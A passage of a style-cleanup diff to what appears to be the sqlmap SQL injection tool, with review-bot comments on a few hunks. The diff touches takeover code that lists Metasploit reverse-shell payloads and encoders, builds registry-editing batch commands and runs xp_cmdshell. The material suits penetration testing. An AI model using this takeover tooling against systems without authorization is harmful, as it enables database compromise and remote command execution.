@@ -1040,7 +1039,7 @@ def _randomizeParameter(paramString, randomParameter): name = safeVariableNaming(name) elif name in keywords: name = "%s%s" % (name, EVALCODE_KEYWORD_SUFFIX) - value = urldecode(value, convall=True, spaceplus=(item==post and kb.postSpaceToPlus)) + value = urldecode(value, convall=True, spaceplus=(item == post and kb.postSpaceToPlus)) variables[name] = value if cookie: diff --git a/lib/request/httpshandler.py b/lib/request/httpshandler.py index bd8fe4b5122..cb41f5af0ff 100644 --- a/lib/request/httpshandler.py +++ b/lib/request/httpshandler.py @@ -48,7 +48,7 @@ def create_sock(): # Reference(s): https://docs.python.org/2/library/ssl.html#ssl.SSLContext # https://www.mnot.net/blog/2014/12/27/python_2_and_tls_sni - if re.search(r"\A[\d.]+\Z", self.host) is None and kb.tlsSNI.get(self.host) != False and hasattr(ssl, "SSLContext"): + if re.search(r"\A[\d.]+\Z", self.host) is None and kb.tlsSNI.get(self.host) is not False and hasattr(ssl, "SSLContext"): for protocol in filter(lambda _: _ >= ssl.PROTOCOL_TLSv1, _protocols): try: sock = create_sock() diff --git a/lib/request/inject.py b/lib/request/inject.py index 485b835c475..35b0ad91057 100644 --- a/lib/request/inject.py +++ b/lib/request/inject.py 
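Review bot: The guard `re.search(r"\A[\d.]+\Z", self.host) is None` recognises only dotted IPv4 literals, so an IPv6 literal host (which always contains `:`) would presumably still be offered as the SNI name, although the check reads as if its intent is to skip SNI for IP addresses; the switch to `is not False` does not touch that. Adding `and ":" not in self.host` to the condition would cover it, assuming `self.host` carries no port suffix at this point. For a map that only ever holds booleans or None, `is not False` and `!= False` select the same hosts, so that part of the change is behaviour-neutral. The enclosing method starts before the hunk and continues after it.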
@@ -175,10 +175,7 @@ def _goInferenceProxy(expression, fromUser=False, batch=False, unpack=True, char # forge the SQL limiting the query output one entry at a time # NOTE: we assume that only queries that get data from a table # can return multiple entries - if fromUser and " FROM " in expression.upper() and ((Backend.getIdentifiedDbms() \ - not in FROM_DUMMY_TABLE) or (Backend.getIdentifiedDbms() in FROM_DUMMY_TABLE and not \ - expression.upper().endswith(FROM_DUMMY_TABLE[Backend.getIdentifiedDbms()]))) \ - and not re.search(SQL_SCALAR_REGEX, expression, re.I): + if fromUser and " FROM " in expression.upper() and ((Backend.getIdentifiedDbms() not in FROM_DUMMY_TABLE) or (Backend.getIdentifiedDbms() in FROM_DUMMY_TABLE and not expression.upper().endswith(FROM_DUMMY_TABLE[Backend.getIdentifiedDbms()]))) and not re.search(SQL_SCALAR_REGEX, expression, re.I): expression, limitCond, topLimit, startLimit, stopLimit = agent.limitCondition(expression) if limitCond: diff --git a/lib/request/templates.py b/lib/request/templates.py index cad883bfd12..ff8ac82fe35 100644 --- a/lib/request/templates.py +++ b/lib/request/templates.py @@ -19,4 +19,3 @@ def getPageTemplate(payload, place): retVal = kb.pageTemplates[(payload, place)] return retVal - diff --git a/lib/takeover/abstraction.py b/lib/takeover/abstraction.py index 5a50ea98640..eb653c9895b 100644 --- a/lib/takeover/abstraction.py +++ b/lib/takeover/abstraction.py @@ -172,9 +172,9 @@ def _initRunAs(self): inject.goStacked(expression) # TODO: add support for PostgreSQL - #elif Backend.isDbms(DBMS.PGSQL): - # expression = getSQLSnippet(DBMS.PGSQL, "configure_dblink", ENABLE="1") - # inject.goStacked(expression) + # elif Backend.isDbms(DBMS.PGSQL): + # expression = getSQLSnippet(DBMS.PGSQL, "configure_dblink", ENABLE="1") + # inject.goStacked(expression) def initEnv(self, mandatory=True, detailed=False, web=False, forceInit=False): self._initRunAs() 
diff --git a/lib/takeover/metasploit.py b/lib/takeover/metasploit.py index 5813ca3361b..fb26052f862 100644 --- a/lib/takeover/metasploit.py +++ b/lib/takeover/metasploit.py @@ -81,6 +81,7 @@ def _initVars(self): _ = normalizePath(os.path.join(_, "..")) if _ == old: break + self._msfCli = "%s & ruby %s" % (_, self._msfCli) self._msfConsole = "%s & ruby %s" % (_, self._msfConsole) self._msfEncode = "ruby %s" % self._msfEncode 
@@ -88,60 +89,60 @@ def _initVars(self): self._msfVenom = "%s & ruby %s" % (_, self._msfVenom) self._msfPayloadsList = { - "windows": { - 1: ("Meterpreter (default)", "windows/meterpreter"), - 2: ("Shell", "windows/shell"), - 3: ("VNC", "windows/vncinject"), - }, - "linux": { - 1: ("Shell (default)", "linux/x86/shell"), - 2: ("Meterpreter (beta)", "linux/x86/meterpreter"), - } - } + "windows": { + 1: ("Meterpreter (default)", "windows/meterpreter"), + 2: ("Shell", "windows/shell"), + 3: ("VNC", "windows/vncinject"), + }, + "linux": { + 1: ("Shell (default)", "linux/x86/shell"), + 2: ("Meterpreter (beta)", "linux/x86/meterpreter"), + } + } self._msfConnectionsList = { - "windows": { - 1: ("Reverse TCP: Connect back from the database host to this machine (default)", "reverse_tcp"), - 2: ("Reverse TCP: Try to connect back from the database host to this machine, on all ports between the specified and 65535", "reverse_tcp_allports"), - 3: ("Reverse HTTP: Connect back from the database host to this machine tunnelling traffic over HTTP", "reverse_http"), - 4: ("Reverse HTTPS: Connect back from the database host to this machine tunnelling traffic over HTTPS", "reverse_https"), - 5: ("Bind TCP: Listen on the database host for a connection", "bind_tcp"), - }, - "linux": { - 1: ("Reverse TCP: Connect back from the database host to this machine (default)", "reverse_tcp"), - 2: ("Bind TCP: Listen on the database host for a connection", "bind_tcp"), - } - } + "windows": { + 1: ("Reverse TCP: Connect back from the database host to this machine (default)", "reverse_tcp"), + 2: ("Reverse TCP: Try to connect back from the database host to this machine, on all ports between the specified and 65535", "reverse_tcp_allports"), + 3: ("Reverse HTTP: Connect back from the database host to this machine tunnelling traffic over HTTP", "reverse_http"), + 4: ("Reverse HTTPS: Connect back from the database host to this machine tunnelling traffic over HTTPS", "reverse_https"), + 5: ("Bind TCP: 
Listen on the database host for a connection", "bind_tcp"), + }, + "linux": { + 1: ("Reverse TCP: Connect back from the database host to this machine (default)", "reverse_tcp"), + 2: ("Bind TCP: Listen on the database host for a connection", "bind_tcp"), + } + } self._msfEncodersList = { - "windows": { - 1: ("No Encoder", "generic/none"), - 2: ("Alpha2 Alphanumeric Mixedcase Encoder", "x86/alpha_mixed"), - 3: ("Alpha2 Alphanumeric Uppercase Encoder", "x86/alpha_upper"), - 4: ("Avoid UTF8/tolower", "x86/avoid_utf8_tolower"), - 5: ("Call+4 Dword XOR Encoder", "x86/call4_dword_xor"), - 6: ("Single-byte XOR Countdown Encoder", "x86/countdown"), - 7: ("Variable-length Fnstenv/mov Dword XOR Encoder", "x86/fnstenv_mov"), - 8: ("Polymorphic Jump/Call XOR Additive Feedback Encoder", "x86/jmp_call_additive"), - 9: ("Non-Alpha Encoder", "x86/nonalpha"), - 10: ("Non-Upper Encoder", "x86/nonupper"), - 11: ("Polymorphic XOR Additive Feedback Encoder (default)", "x86/shikata_ga_nai"), - 12: ("Alpha2 Alphanumeric Unicode Mixedcase Encoder", "x86/unicode_mixed"), - 13: ("Alpha2 Alphanumeric Unicode Uppercase Encoder", "x86/unicode_upper"), - } - } + "windows": { + 1: ("No Encoder", "generic/none"), + 2: ("Alpha2 Alphanumeric Mixedcase Encoder", "x86/alpha_mixed"), + 3: ("Alpha2 Alphanumeric Uppercase Encoder", "x86/alpha_upper"), + 4: ("Avoid UTF8/tolower", "x86/avoid_utf8_tolower"), + 5: ("Call+4 Dword XOR Encoder", "x86/call4_dword_xor"), + 6: ("Single-byte XOR Countdown Encoder", "x86/countdown"), + 7: ("Variable-length Fnstenv/mov Dword XOR Encoder", "x86/fnstenv_mov"), + 8: ("Polymorphic Jump/Call XOR Additive Feedback Encoder", "x86/jmp_call_additive"), + 9: ("Non-Alpha Encoder", "x86/nonalpha"), + 10: ("Non-Upper Encoder", "x86/nonupper"), + 11: ("Polymorphic XOR Additive Feedback Encoder (default)", "x86/shikata_ga_nai"), + 12: ("Alpha2 Alphanumeric Unicode Mixedcase Encoder", "x86/unicode_mixed"), + 13: ("Alpha2 Alphanumeric Unicode Uppercase Encoder", 
"x86/unicode_upper"), + } + } self._msfSMBPortsList = { - "windows": { - 1: ("139/TCP", "139"), - 2: ("445/TCP (default)", "445"), - } - } + "windows": { + 1: ("139/TCP", "139"), + 2: ("445/TCP (default)", "445"), + } + } self._portData = { - "bind": "remote port number", - "reverse": "local port number", - } + "bind": "remote port number", + "reverse": "local port number", + } def _skeletonSelection(self, msg, lst=None, maxValue=1, default=1): if Backend.isOs(OS.WINDOWS): @@ -484,10 +485,13 @@ def _loadMetExtensions(self, proc, metSess): send_all(proc, "use espia\n") send_all(proc, "use incognito\n") - # This extension is loaded by default since Metasploit > 3.7 - #send_all(proc, "use priv\n") - # This extension freezes the connection on 64-bit systems - #send_all(proc, "use sniffer\n") + + # This extension is loaded by default since Metasploit > 3.7: + # send_all(proc, "use priv\n") + + # This extension freezes the connection on 64-bit systems: + # send_all(proc, "use sniffer\n") + send_all(proc, "sysinfo\n") send_all(proc, "getuid\n") diff --git a/lib/takeover/registry.py b/lib/takeover/registry.py index 043ed56bd2a..00b5183a7b2 100644 --- a/lib/takeover/registry.py +++ b/lib/takeover/registry.py 
@@ -33,19 +33,19 @@ def _initVars(self, regKey, regValue, regType=None, regData=None, parse=False): readParse = "REG QUERY \"" + self._regKey + "\" /v \"" + self._regValue + "\"" self._batRead = ( - "@ECHO OFF\r\n", - readParse, - ) + "@ECHO OFF\r\n", + readParse, + ) self._batAdd = ( - "@ECHO OFF\r\n", - "REG ADD \"%s\" /v \"%s\" /t %s /d %s /f" % (self._regKey, self._regValue, self._regType, self._regData), - ) + "@ECHO OFF\r\n", + "REG ADD \"%s\" /v \"%s\" /t %s /d %s /f" % (self._regKey, self._regValue, self._regType, self._regData), + ) self._batDel = ( - "@ECHO OFF\r\n", - "REG DELETE \"%s\" /v \"%s\" /f" % (self._regKey, self._regValue), - ) + "@ECHO OFF\r\n", + "REG DELETE \"%s\" /v \"%s\" /f" % (self._regKey, self._regValue), + ) def _createLocalBatchFile(self): self._batPathFp = open(self._batPathLocal, "w") diff --git a/lib/takeover/web.py b/lib/takeover/web.py index 617d67a5ad1..a907bc14905 100644 --- a/lib/takeover/web.py +++ b/lib/takeover/web.py @@ -112,10 +112,10 @@ def _webFileStreamUpload(self, stream, destFileName, directory): if self.webApi in getPublicTypeMembers(WEB_API, True): multipartParams = { - "upload": "1", - "file": stream, - "uploadDir": directory, - } + "upload": "1", + "file": stream, + "uploadDir": directory, + } if self.webApi == WEB_API.ASPX: multipartParams['__EVENTVALIDATION'] = kb.data.__EVENTVALIDATION diff --git a/lib/takeover/xp_cmdshell.py b/lib/takeover/xp_cmdshell.py index a9b17dd7701..bb99a7dc7e7 100644 --- a/lib/takeover/xp_cmdshell.py +++ b/lib/takeover/xp_cmdshell.py 
@@ -214,7 +214,7 @@ def xpCmdshellEvalCmd(self, cmd, first=None, last=None): if any(isTechniqueAvailable(_) for _ in (PAYLOAD.TECHNIQUE.UNION, PAYLOAD.TECHNIQUE.ERROR, PAYLOAD.TECHNIQUE.QUERY)) or conf.direct: output = inject.getValue(query, resumeValue=False, blind=False, time=False) - if (output is None) or len(output)==0 or output[0] is None: + if (output is None) or len(output) == 0 or output[0] is None: output = [] count = inject.getValue("SELECT COUNT(id) FROM %s" % self.cmdTblName, resumeValue=False, union=False, error=False, expected=EXPECTED.INT, charsetType=CHARSET_TYPE.DIGITS) diff --git a/lib/techniques/blind/inference.py b/lib/techniques/blind/inference.py index 61f92b6ef49..2783231f503 100644 --- a/lib/techniques/blind/inference.py +++ b/lib/techniques/blind/inference.py @@ -611,7 +611,7 @@ def blindThread(): # If we had no luck with commonValue and common charset, # use the returned other charset if not val: - val = getChar(index, otherCharset, otherCharset==asciiTbl) + val = getChar(index, otherCharset, otherCharset == asciiTbl) else: val = getChar(index, asciiTbl, not(charsetType is None and conf.charset)) diff --git a/lib/techniques/error/use.py b/lib/techniques/error/use.py index 769e0991a2c..cf84aa71347 100644 --- a/lib/techniques/error/use.py +++ b/lib/techniques/error/use.py 
@@ -133,20 +133,23 @@ def _oneShotErrorUse(expression, field=None, chunkTest=False): # Parse the returned page to get the exact error-based # SQL injection output - output = reduce(lambda x, y: x if x is not None else y, (\ - extractRegexResult(check, page), \ - extractRegexResult(check, threadData.lastHTTPError[2] if wasLastResponseHTTPError() else None), \ - extractRegexResult(check, listToStrValue((headers[header] for header in headers if header.lower() != HTTP_HEADER.URI.lower()) if headers else None)), \ - extractRegexResult(check, threadData.lastRedirectMsg[1] if threadData.lastRedirectMsg and threadData.lastRedirectMsg[0] == threadData.lastRequestUID else None)), \ - None) + output = reduce(lambda x, y: x if x is not None else y, ( + extractRegexResult(check, page), + extractRegexResult(check, threadData.lastHTTPError[2] if wasLastResponseHTTPError() else None), + extractRegexResult(check, listToStrValue((headers[header] for header in headers if header.lower() != HTTP_HEADER.URI.lower()) if headers else None)), + extractRegexResult(check, threadData.lastRedirectMsg[1] if threadData.lastRedirectMsg and threadData.lastRedirectMsg[0] == threadData.lastRequestUID else None)), + None + ) if output is not None: output = getUnicode(output) else: - trimmed = extractRegexResult(trimcheck, page) \ - or extractRegexResult(trimcheck, threadData.lastHTTPError[2] if wasLastResponseHTTPError() else None) \ - or extractRegexResult(trimcheck, listToStrValue((headers[header] for header in headers if header.lower() != HTTP_HEADER.URI.lower()) if headers else None)) \ - or extractRegexResult(trimcheck, threadData.lastRedirectMsg[1] if threadData.lastRedirectMsg and threadData.lastRedirectMsg[0] == threadData.lastRequestUID else None) + trimmed = ( + extractRegexResult(trimcheck, page) or + extractRegexResult(trimcheck, threadData.lastHTTPError[2] if wasLastResponseHTTPError() else None) or + extractRegexResult(trimcheck, listToStrValue((headers[header] for header in headers if 
header.lower() != HTTP_HEADER.URI.lower()) if headers else None)) or + extractRegexResult(trimcheck, threadData.lastRedirectMsg[1] if threadData.lastRedirectMsg and threadData.lastRedirectMsg[0] == threadData.lastRequestUID else None) + ) if trimmed: if not chunkTest: @@ -308,12 +311,7 @@ def errorUse(expression, dump=False): # entry at a time # NOTE: we assume that only queries that get data from a table can # return multiple entries - if (dump and (conf.limitStart or conf.limitStop)) or (" FROM " in \ - expression.upper() and ((Backend.getIdentifiedDbms() not in FROM_DUMMY_TABLE) \ - or (Backend.getIdentifiedDbms() in FROM_DUMMY_TABLE and not \ - expression.upper().endswith(FROM_DUMMY_TABLE[Backend.getIdentifiedDbms()]))) \ - and ("(CASE" not in expression.upper() or ("(CASE" in expression.upper() and "WHEN use" in expression))) \ - and not re.search(SQL_SCALAR_REGEX, expression, re.I): + if (dump and (conf.limitStart or conf.limitStop)) or (" FROM " in expression.upper() and ((Backend.getIdentifiedDbms() not in FROM_DUMMY_TABLE) or (Backend.getIdentifiedDbms() in FROM_DUMMY_TABLE and not expression.upper().endswith(FROM_DUMMY_TABLE[Backend.getIdentifiedDbms()]))) and ("(CASE" not in expression.upper() or ("(CASE" in expression.upper() and "WHEN use" in expression))) and not re.search(SQL_SCALAR_REGEX, expression, re.I): expression, limitCond, topLimit, startLimit, stopLimit = agent.limitCondition(expression, dump) if limitCond: diff --git a/lib/techniques/union/use.py b/lib/techniques/union/use.py index 6be9d4bbc48..8d69f9c9b5c 100644 --- a/lib/techniques/union/use.py +++ b/lib/techniques/union/use.py 
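Review bot: Now that the two candidate lists in `_oneShotErrorUse` are laid out side by side, it is visible that they select differently: `output` takes the first result that is not None (via `reduce`), so an empty-string match would be kept, while `trimmed` uses `or` and takes the first truthy one. If that difference is intended, a short comment above `trimmed = (` should say so; otherwise both can use the same rule, and the `reduce`/lambda form reads more directly as `output = next((_ for _ in candidates if _ is not None), None)` with the four `extractRegexResult(...)` calls bound to `candidates`. `_oneShotErrorUse` starts before the hunk and continues after it.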
@@ -233,13 +233,7 @@ def unionUse(expression, unpack=True, dump=False): # SQL limiting the query output one entry at a time # NOTE: we assume that only queries that get data from a table can # return multiple entries - if value is None and (kb.injection.data[PAYLOAD.TECHNIQUE.UNION].where == PAYLOAD.WHERE.NEGATIVE or \ - kb.forcePartialUnion or \ - (dump and (conf.limitStart or conf.limitStop)) or "LIMIT " in expression.upper()) and \ - " FROM " in expression.upper() and ((Backend.getIdentifiedDbms() \ - not in FROM_DUMMY_TABLE) or (Backend.getIdentifiedDbms() in FROM_DUMMY_TABLE \ - and not expression.upper().endswith(FROM_DUMMY_TABLE[Backend.getIdentifiedDbms()]))) \ - and not re.search(SQL_SCALAR_REGEX, expression, re.I): + if value is None and (kb.injection.data[PAYLOAD.TECHNIQUE.UNION].where == PAYLOAD.WHERE.NEGATIVE or kb.forcePartialUnion or (dump and (conf.limitStart or conf.limitStop)) or "LIMIT " in expression.upper()) and " FROM " in expression.upper() and ((Backend.getIdentifiedDbms() not in FROM_DUMMY_TABLE) or (Backend.getIdentifiedDbms() in FROM_DUMMY_TABLE and not expression.upper().endswith(FROM_DUMMY_TABLE[Backend.getIdentifiedDbms()]))) and not re.search(SQL_SCALAR_REGEX, expression, re.I): expression, limitCond, topLimit, startLimit, stopLimit = agent.limitCondition(expression, dump) if limitCond: diff --git a/lib/utils/api.py b/lib/utils/api.py index d40cc17977c..967340fc48a 100644 --- a/lib/utils/api.py +++ b/lib/utils/api.py @@ -94,7 +94,7 @@ def execute(self, statement, arguments=None): else: self.cursor.execute(statement) except sqlite3.OperationalError, ex: - if not "locked" in getSafeExString(ex): + if "locked" not in getSafeExString(ex): raise else: break 
@@ -103,22 +103,11 @@ def execute(self, statement, arguments=None): return self.cursor.fetchall() def init(self): - self.execute("CREATE TABLE logs(" - "id INTEGER PRIMARY KEY AUTOINCREMENT, " - "taskid INTEGER, time TEXT, " - "level TEXT, message TEXT" - ")") - - self.execute("CREATE TABLE data(" - "id INTEGER PRIMARY KEY AUTOINCREMENT, " - "taskid INTEGER, status INTEGER, " - "content_type INTEGER, value TEXT" - ")") - - self.execute("CREATE TABLE errors(" - "id INTEGER PRIMARY KEY AUTOINCREMENT, " - "taskid INTEGER, error TEXT" - ")") + self.execute("CREATE TABLE logs(id INTEGER PRIMARY KEY AUTOINCREMENT, taskid INTEGER, time TEXT, level TEXT, message TEXT)") + + self.execute("CREATE TABLE data(id INTEGER PRIMARY KEY AUTOINCREMENT, taskid INTEGER, status INTEGER, content_type INTEGER, value TEXT)") + + self.execute("CREATE TABLE errors(id INTEGER PRIMARY KEY AUTOINCREMENT, taskid INTEGER, error TEXT)") class Task(object): def __init__(self, taskid, remote_addr): @@ -860,7 +849,7 @@ def client(host=RESTAPI_DEFAULT_ADDRESS, port=RESTAPI_DEFAULT_PORT, username=Non return elif command in ("help", "?"): - msg = "help Show this help message\n" + msg = "help Show this help message\n" msg += "new ARGS Start a new scan task with provided arguments (e.g. 'new -u \"http://testphp.vulnweb.com/artists.php?artist=1\"')\n" msg += "use TASKID Switch current context to different task (e.g. 'use c04d8c5c7582efb4')\n" msg += "data Retrieve and show data for current task\n" diff --git a/lib/utils/crawler.py b/lib/utils/crawler.py index 6c844859474..bcd9495fccb 100644 --- a/lib/utils/crawler.py +++ b/lib/utils/crawler.py @@ -167,7 +167,7 @@ def crawlThread(): if not conf.bulkFile: logger.info("searching for links with depth %d" % (i + 1)) - runThreads(numThreads, crawlThread, threadChoice=(i>0)) + runThreads(numThreads, crawlThread, threadChoice=(i > 0)) clearConsoleLine(True) if threadData.shared.deeper: 
diff --git a/lib/utils/deps.py b/lib/utils/deps.py index 835cb3568b3..e2ea0aa9b5f 100644 --- a/lib/utils/deps.py +++ b/lib/utils/deps.py @@ -108,4 +108,3 @@ def checkDependencies(): if len(missing_libraries) == 0: infoMsg = "all dependencies are installed" logger.info(infoMsg) - diff --git a/lib/utils/getch.py b/lib/utils/getch.py index 00de945bf7a..65043421e4e 100644 --- a/lib/utils/getch.py +++ b/lib/utils/getch.py @@ -25,7 +25,7 @@ def __call__(self): class _GetchUnix(object): def __init__(self): - import tty + __import__("tty") def __call__(self): import sys @@ -44,7 +44,7 @@ def __call__(self): class _GetchWindows(object): def __init__(self): - import msvcrt + __import__("msvcrt") def __call__(self): import msvcrt @@ -81,4 +81,3 @@ def __call__(self): getch = _Getch() - diff --git a/lib/utils/hash.py b/lib/utils/hash.py index 508d3a9ca5b..6487ba25a0c 100644 --- a/lib/utils/hash.py +++ b/lib/utils/hash.py @@ -135,7 +135,6 @@ def postgres_passwd(password, username, uppercase=False): 'md599e5ea7a6f7c3269995cba3927fd0093' """ - if isinstance(username, unicode): username = unicode.encode(username, UNICODE_ENCODING) @@ -380,7 +379,7 @@ def _encode64(value, count): ctx = password + magic + salt final = md5(password + salt + password).digest() - for pl in xrange(len(password),0,-16): + for pl in xrange(len(password), 0, -16): if pl > 16: ctx = ctx + final[:16] else: @@ -389,7 +388,7 @@ def _encode64(value, count): i = len(password) while i: if i & 1: - ctx = ctx + chr(0) #if ($i & 1) { $ctx->add(pack("C", 0)); } + ctx = ctx + chr(0) # if ($i & 1) { $ctx->add(pack("C", 0)); } else: ctx = ctx + password[0] i = i >> 1 
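Review bot: The new `__import__("tty")` in `_GetchUnix.__init__` (and `__import__("msvcrt")` in `_GetchWindows.__init__` in the next hunk) reads like a dead statement because its return value is discarded; it appears to be an availability probe whose only job is to raise ImportError so that another implementation can be chosen, but nothing in the hunk says so. A one-line comment on each, `# availability probe: raises ImportError where the module is missing`, would stop a later cleanup from deleting the line. If the selection happens in `_Getch` (outside these hunks), the comment could point there.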
@@ -417,7 +416,7 @@ def _encode64(value, count): final = md5(ctx1).digest() - hash_ = _encode64((int(ord(final[0])) << 16) | (int(ord(final[6])) << 8) | (int(ord(final[12]))),4) + hash_ = _encode64((int(ord(final[0])) << 16) | (int(ord(final[6])) << 8) | (int(ord(final[12]))), 4) hash_ = hash_ + _encode64((int(ord(final[1])) << 16) | (int(ord(final[7])) << 8) | (int(ord(final[13]))), 4) hash_ = hash_ + _encode64((int(ord(final[2])) << 16) | (int(ord(final[8])) << 8) | (int(ord(final[14]))), 4) hash_ = hash_ + _encode64((int(ord(final[3])) << 16) | (int(ord(final[9])) << 8) | (int(ord(final[15]))), 4) 
@@ -522,38 +521,38 @@ def _encode64(input_, count): return "%s%s" % (prefix, _encode64(hash_, 16)) __functions__ = { - HASH.MYSQL: mysql_passwd, - HASH.MYSQL_OLD: mysql_old_passwd, - HASH.POSTGRES: postgres_passwd, - HASH.MSSQL: mssql_passwd, - HASH.MSSQL_OLD: mssql_old_passwd, - HASH.MSSQL_NEW: mssql_new_passwd, - HASH.ORACLE: oracle_passwd, - HASH.ORACLE_OLD: oracle_old_passwd, - HASH.MD5_GENERIC: md5_generic_passwd, - HASH.SHA1_GENERIC: sha1_generic_passwd, - HASH.SHA224_GENERIC: sha224_generic_passwd, - HASH.SHA256_GENERIC: sha256_generic_passwd, - HASH.SHA384_GENERIC: sha384_generic_passwd, - HASH.SHA512_GENERIC: sha512_generic_passwd, - HASH.CRYPT_GENERIC: crypt_generic_passwd, - HASH.JOOMLA: joomla_passwd, - HASH.DJANGO_MD5: django_md5_passwd, - HASH.DJANGO_SHA1: django_sha1_passwd, - HASH.WORDPRESS: wordpress_passwd, - HASH.APACHE_MD5_CRYPT: unix_md5_passwd, - HASH.UNIX_MD5_CRYPT: unix_md5_passwd, - HASH.APACHE_SHA1: apache_sha1_passwd, - HASH.VBULLETIN: vbulletin_passwd, - HASH.VBULLETIN_OLD: vbulletin_passwd, - HASH.SSHA: ssha_passwd, - HASH.SSHA256: ssha256_passwd, - HASH.SSHA512: ssha512_passwd, - HASH.MD5_BASE64: md5_generic_passwd, - HASH.SHA1_BASE64: sha1_generic_passwd, - HASH.SHA256_BASE64: sha256_generic_passwd, - HASH.SHA512_BASE64: sha512_generic_passwd, - } + HASH.MYSQL: mysql_passwd, + HASH.MYSQL_OLD: mysql_old_passwd, + HASH.POSTGRES: postgres_passwd, + HASH.MSSQL: mssql_passwd, + HASH.MSSQL_OLD: mssql_old_passwd, + HASH.MSSQL_NEW: mssql_new_passwd, + HASH.ORACLE: oracle_passwd, + HASH.ORACLE_OLD: oracle_old_passwd, + HASH.MD5_GENERIC: md5_generic_passwd, + HASH.SHA1_GENERIC: sha1_generic_passwd, + HASH.SHA224_GENERIC: sha224_generic_passwd, + HASH.SHA256_GENERIC: sha256_generic_passwd, + HASH.SHA384_GENERIC: sha384_generic_passwd, + HASH.SHA512_GENERIC: sha512_generic_passwd, + HASH.CRYPT_GENERIC: crypt_generic_passwd, + HASH.JOOMLA: joomla_passwd, + HASH.DJANGO_MD5: django_md5_passwd, + HASH.DJANGO_SHA1: django_sha1_passwd, + 
HASH.WORDPRESS: wordpress_passwd, + HASH.APACHE_MD5_CRYPT: unix_md5_passwd, + HASH.UNIX_MD5_CRYPT: unix_md5_passwd, + HASH.APACHE_SHA1: apache_sha1_passwd, + HASH.VBULLETIN: vbulletin_passwd, + HASH.VBULLETIN_OLD: vbulletin_passwd, + HASH.SSHA: ssha_passwd, + HASH.SSHA256: ssha256_passwd, + HASH.SSHA512: ssha512_passwd, + HASH.MD5_BASE64: md5_generic_passwd, + HASH.SHA1_BASE64: sha1_generic_passwd, + HASH.SHA256_BASE64: sha256_generic_passwd, + HASH.SHA512_BASE64: sha512_generic_passwd, +} def storeHashesToFile(attack_dict): if not attack_dict: diff --git a/lib/utils/htmlentities.py b/lib/utils/htmlentities.py index 361acf54900..399e3580c43 100644 --- a/lib/utils/htmlentities.py +++ b/lib/utils/htmlentities.py 
@@ -8,256 +8,256 @@ # Reference: http://www.w3.org/TR/1999/REC-html401-19991224/sgml/entities.html htmlEntities = { - 'quot': 34, - 'amp': 38, - 'lt': 60, - 'gt': 62, - 'nbsp': 160, - 'iexcl': 161, - 'cent': 162, - 'pound': 163, - 'curren': 164, - 'yen': 165, - 'brvbar': 166, - 'sect': 167, - 'uml': 168, - 'copy': 169, - 'ordf': 170, - 'laquo': 171, - 'not': 172, - 'shy': 173, - 'reg': 174, - 'macr': 175, - 'deg': 176, - 'plusmn': 177, - 'sup2': 178, - 'sup3': 179, - 'acute': 180, - 'micro': 181, - 'para': 182, - 'middot': 183, - 'cedil': 184, - 'sup1': 185, - 'ordm': 186, - 'raquo': 187, - 'frac14': 188, - 'frac12': 189, - 'frac34': 190, - 'iquest': 191, - 'Agrave': 192, - 'Aacute': 193, - 'Acirc': 194, - 'Atilde': 195, - 'Auml': 196, - 'Aring': 197, - 'AElig': 198, - 'Ccedil': 199, - 'Egrave': 200, - 'Eacute': 201, - 'Ecirc': 202, - 'Euml': 203, - 'Igrave': 204, - 'Iacute': 205, - 'Icirc': 206, - 'Iuml': 207, - 'ETH': 208, - 'Ntilde': 209, - 'Ograve': 210, - 'Oacute': 211, - 'Ocirc': 212, - 'Otilde': 213, - 'Ouml': 214, - 'times': 215, - 'Oslash': 216, - 'Ugrave': 217, - 'Uacute': 218, - 'Ucirc': 219, - 'Uuml': 220, - 'Yacute': 221, - 'THORN': 222, - 'szlig': 223, - 'agrave': 224, - 'aacute': 225, - 'acirc': 226, - 'atilde': 227, - 'auml': 228, - 'aring': 229, - 'aelig': 230, - 'ccedil': 231, - 'egrave': 232, - 'eacute': 233, - 'ecirc': 234, - 'euml': 235, - 'igrave': 236, - 'iacute': 237, - 'icirc': 238, - 'iuml': 239, - 'eth': 240, - 'ntilde': 241, - 'ograve': 242, - 'oacute': 243, - 'ocirc': 244, - 'otilde': 245, - 'ouml': 246, - 'divide': 247, - 'oslash': 248, - 'ugrave': 249, - 'uacute': 250, - 'ucirc': 251, - 'uuml': 252, - 'yacute': 253, - 'thorn': 254, - 'yuml': 255, - 'OElig': 338, - 'oelig': 339, - 'Scaron': 352, - 'fnof': 402, - 'scaron': 353, - 'Yuml': 376, - 'circ': 710, - 'tilde': 732, - 'Alpha': 913, - 'Beta': 914, - 'Gamma': 915, - 'Delta': 916, - 'Epsilon': 917, - 'Zeta': 918, - 'Eta': 919, - 'Theta': 920, - 'Iota': 921, - 'Kappa': 922, - 
'Lambda': 923, - 'Mu': 924, - 'Nu': 925, - 'Xi': 926, - 'Omicron': 927, - 'Pi': 928, - 'Rho': 929, - 'Sigma': 931, - 'Tau': 932, - 'Upsilon': 933, - 'Phi': 934, - 'Chi': 935, - 'Psi': 936, - 'Omega': 937, - 'alpha': 945, - 'beta': 946, - 'gamma': 947, - 'delta': 948, - 'epsilon': 949, - 'zeta': 950, - 'eta': 951, - 'theta': 952, - 'iota': 953, - 'kappa': 954, - 'lambda': 955, - 'mu': 956, - 'nu': 957, - 'xi': 958, - 'omicron': 959, - 'pi': 960, - 'rho': 961, - 'sigmaf': 962, - 'sigma': 963, - 'tau': 964, - 'upsilon': 965, - 'phi': 966, - 'chi': 967, - 'psi': 968, - 'omega': 969, - 'thetasym': 977, - 'upsih': 978, - 'piv': 982, - 'bull': 8226, - 'hellip': 8230, - 'prime': 8242, - 'Prime': 8243, - 'oline': 8254, - 'frasl': 8260, - 'ensp': 8194, - 'emsp': 8195, - 'thinsp': 8201, - 'zwnj': 8204, - 'zwj': 8205, - 'lrm': 8206, - 'rlm': 8207, - 'ndash': 8211, - 'mdash': 8212, - 'lsquo': 8216, - 'rsquo': 8217, - 'sbquo': 8218, - 'ldquo': 8220, - 'rdquo': 8221, - 'bdquo': 8222, - 'dagger': 8224, - 'Dagger': 8225, - 'permil': 8240, - 'lsaquo': 8249, - 'rsaquo': 8250, - 'euro': 8364, - 'weierp': 8472, - 'image': 8465, - 'real': 8476, - 'trade': 8482, - 'alefsym': 8501, - 'larr': 8592, - 'uarr': 8593, - 'rarr': 8594, - 'darr': 8595, - 'harr': 8596, - 'crarr': 8629, - 'lArr': 8656, - 'uArr': 8657, - 'rArr': 8658, - 'dArr': 8659, - 'hArr': 8660, - 'forall': 8704, - 'part': 8706, - 'exist': 8707, - 'empty': 8709, - 'nabla': 8711, - 'isin': 8712, - 'notin': 8713, - 'ni': 8715, - 'prod': 